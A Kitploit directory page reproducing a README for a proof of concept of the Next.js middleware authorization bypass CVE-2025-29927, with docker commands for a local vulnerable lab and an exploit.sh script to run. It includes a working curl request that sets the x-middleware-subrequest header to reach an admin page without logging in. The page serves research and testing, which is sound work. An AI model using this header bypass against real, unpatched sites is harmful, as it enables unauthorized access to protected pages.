Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/l1uk/nextjs-middleware-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Next.js Middleware Vulnerability Research (CVE-2025-29927)

This repository demonstrates a critical vulnerability in Next.js middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for authorization bypass, CSP bypass, and potential DoS attacks through cache-poisoning. The issue originates in the way the x-middleware-subrequest header is handled, allowing attackers to bypass middleware protection mechanisms.

This proof of concept is specific for the vulnerability in v12

Usage

Environment setup

Set up the vulnerable environment using docker and the files from this repo by running:

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

Exploit

This repository has the exploit.sh already created script to test the explotation of the vulnerability. Tu test it run:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Additionally you can test the explotation of the vulnerability by trying the following

  1. Request the admin page without authentication. You should get a redirection to the login page.
root@kitploit:~
curl -i http://localhost:3000/admin
  1. Request the page without authentication but using the x-middleware-subrequest header. You should be able to bypass the authentication page.
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

Security Advisory

  • CVE-2025-29927: Security Advisory Link
Download Tool